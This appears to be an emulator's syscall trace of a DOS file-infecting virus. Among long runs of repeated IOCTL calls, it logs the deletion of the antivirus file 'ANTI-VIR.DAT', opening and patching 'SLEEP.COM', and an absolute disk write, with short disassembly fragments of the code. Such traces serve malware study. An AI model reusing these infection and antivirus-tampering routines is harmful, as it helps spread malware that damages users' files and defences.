2018-12-17T21:54:06.326975855Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.330973346Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.332195673Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.333521646Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.33531943Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.336507028Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.337755841Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.33998372Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.341035972Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.342064987Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.343679986Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.345023886Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.346084011Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.347703965Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.348787869Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.350605109Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.351856018Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.35290872Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.354916278Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.356139522Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.357192753Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.358985327Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.360190196Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.361235002Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.363187966Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.364827437Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.365926159Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.367471465Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.368525678Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.37036212Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.3719719Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.373565552Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.375609902Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.376922221Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.3781618Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.380415345Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.382001248Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.383442418Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.391314868Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.392706281Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.394629625Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.396105118Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.397357479Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.399757923Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.401005366Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.402275991Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.40407148Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.405313679Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.406525598Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.408436149Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.409860058Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.411184987Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.412840791Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.414194465Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.416320604Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.417629247Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.418842036Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.420529291Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.42202044Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.423215478Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.424898164Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.426129446Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.42731616Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.42938422Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.43127819Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.433039024Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.434325977Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.43553874Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.437147936Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.438821367Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.44045335Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.442314473Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.443595827Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.444815592Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.44632627Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.447622585Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.449737184Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.451313664Z 64 PC: 12c22 | Write file or device (Write 999 bytes on handle 5)
2018-12-17T21:54:06.459515969Z 87 PC: 12c33 | Get or set file date and time
2018-12-17T21:54:06.461549965Z 62 PC: 12c38 | Close file
2018-12-17T21:54:06.468951789Z 67 PC: 12c46 | Get or set file attributes
2018-12-17T21:54:06.478334832Z 59 PC: 12c4e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":436,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:40:54.955097625Z 42 PC: 12a62 | Get date 0x12a62: cmp dl, 0x12
0x12a65: jne 0x12a6e
0x12a67: mov cx, 0xae
0x12a6a: mov al, 2
0x12a6c: int 0x26
0x12a6e: popaw
0x12a6f: mov ah, 0x47
0x12a71: mov dl, 0
0x12a73: lea si, word ptr [bp + 0x361]
0x12a77: int 0x21
0x12a79: call 0x12a80
0x12a7c: jmp 0x12aab
0x12a7e: add byte ptr [bx + si], al
0x12a80: pushaw
0x12a81: mov dx, word ptr ds:[bp + 0x13e]
0x12a86: jmp 0x12a8c
0x12a88: mov ah, 0x4c
0x12a8a: int 0x21
0x12a8c: mov cx, 0xae
0x12a8f: lea si, word ptr [bp + 0x16b]
2018-12-25T11:40:54.95786028Z 71 PC: 12a79 | Get current directory
2018-12-25T11:40:54.960834882Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-25T11:40:54.962819083Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.964482873Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.966029853Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.967338776Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.97089411Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.972738499Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.974959992Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.97661244Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.979106746Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.98051863Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.981929338Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.984273634Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.986030108Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.987702363Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.989848064Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.99125569Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.99249125Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.994423083Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.995805943Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.997163562Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:54.999177662Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.000896926Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.0026701Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.00686785Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.008269929Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.009637726Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.011916386Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.013939481Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.015322679Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.016910255Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.018898246Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.02057789Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.022288036Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.02432546Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.0257133Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.02718605Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.033461115Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.035532869Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.036852413Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.038994848Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.040749622Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.041965387Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.043873646Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.045782325Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.047091081Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.048932482Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.050027426Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.051171658Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.052827593Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.054135418Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.055274878Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.056922924Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.058345394Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.059425014Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.061169085Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.062511558Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.063631794Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.065418167Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.066701578Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.067809166Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.069423499Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.070633274Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.071699798Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.073264998Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.074606238Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.076258858Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.081006509Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.082026494Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.08305364Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.084901953Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.086299713Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.087652958Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.089492502Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.090808817Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.092185278Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.093833225Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.095160467Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.09640627Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.097993317Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.099397957Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.100767321Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.102950764Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.104385552Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.105787658Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.109479284Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.110848553Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.112440536Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.122966832Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.124512147Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.126257429Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.128513807Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.132058322Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.134111546Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.135930868Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.137335495Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.138707174Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.140736927Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.142060544Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.143970024Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.146927976Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.148644057Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.150279857Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.158469061Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.159647634Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.160641413Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.170484517Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.172273343Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.173902686Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.17597001Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.177597317Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.178980548Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.181055425Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.182624277Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.184194954Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.197703447Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.199150584Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.200385804Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.20237865Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.203991533Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.205563787Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.208093958Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.209672948Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.21135914Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.212995074Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.214809372Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.216123655Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.218195359Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.219862109Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.221406005Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.223967508Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.225571269Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.227136882Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.229602224Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.231185122Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.232736048Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.234511444Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.237160757Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.238362914Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.239581687Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.242881499Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.24408011Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.24528413Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.246827948Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.248283394Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.249762577Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.251588914Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.252833125Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.254075484Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.25553644Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.256612725Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.257697644Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.259052798Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.260308135Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.261686641Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.263339208Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.264608852Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.265882051Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.267919058Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.269237363Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.271510429Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.273085164Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.274645091Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.276993805Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.278387697Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.279660936Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.281424305Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.282859748Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.283984102Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.286660476Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.287893774Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.289267151Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.291695953Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.293662149Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.295373972Z 250 PC: 12ab5 | UNKNOWN!
2018-12-25T11:40:55.296917792Z 67 PC: 12aee | Get or set file attributes
2018-12-25T11:40:55.302749518Z 65 PC: 12af2 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:40:55.308162402Z 44 PC: 12b0e | Get time 0x12b0e: mov word ptr ds:[bp + 0x13e], dx
0x12b13: jmp 0x12b31
0x12b15: mov ah, 0x3b
0x12b17: lea dx, word ptr [bp + 0x3b3]
0x12b1b: int 0x21
0x12b1d: mov al, byte ptr ds:[bp + 0x3b6]
0x12b22: cmp byte ptr ds:[bp + 0x3b6], 3
0x12b28: je 0x12b88
0x12b2a: inc al
0x12b2c: mov byte ptr ds:[bp + 0x3b6], al
0x12b31: mov ax, 0x4e00
0x12b34: mov cx, 0
0x12b37: lea dx, word ptr [bp + 0x252]
0x12b3b: int 0x21
0x12b3d: jae 0x12b42
0x12b3f: jmp 0x12c46
0x12b42: push 0x4300
0x12b45: pop ax
0x12b46: mov dx, 0x9e
0x12b49: int 0x21
2018-12-25T11:40:55.310345912Z 78 PC: 12b3d | Find first file
2018-12-25T11:40:55.315756986Z 67 PC: 12b4b | Get or set file attributes
2018-12-25T11:40:55.321414834Z 67 PC: 12b58 | Get or set file attributes
2018-12-25T11:40:55.336638304Z 61 PC: 12b60 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:40:55.343450197Z 63 PC: 12b6f | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:40:55.349292343Z 87 PC: 12bbb | Get or set file date and time
2018-12-25T11:40:55.350625597Z 66 PC: 12bce | Move file pointer
2018-12-25T11:40:55.351753219Z 64 PC: 12bdb | Write file or device (Write 1 bytes on handle 5)
2018-12-25T11:40:55.354371765Z 64 PC: 12bfa | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:40:55.357208269Z 64 PC: 12c07 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T11:40:55.359482941Z 66 PC: 12c12 | Move file pointer
2018-12-25T11:40:55.361047615Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.362404112Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.36370458Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.365324219Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.366580946Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.367848496Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.369671683Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.371200892Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.372422344Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.374435691Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.376121688Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.377509195Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.384308765Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.386078025Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.387789689Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.390668444Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.392433391Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.394197467Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.397415037Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.39916835Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.400888784Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.403915602Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.406333122Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.408044129Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.410818702Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.412506439Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.414157669Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.416921947Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.418607772Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.420275462Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.422942962Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.424392535Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.426209318Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.428661113Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.430285266Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.431887751Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.434180858Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.435808249Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.437459844Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.439624929Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.440948081Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.442467489Z 68 PC: 12aa6 | I/O control for devices (See above)
2018-12-25T11:40:55.444307077Z 68 PC: 12aa6 | I/O control for devices (See above)
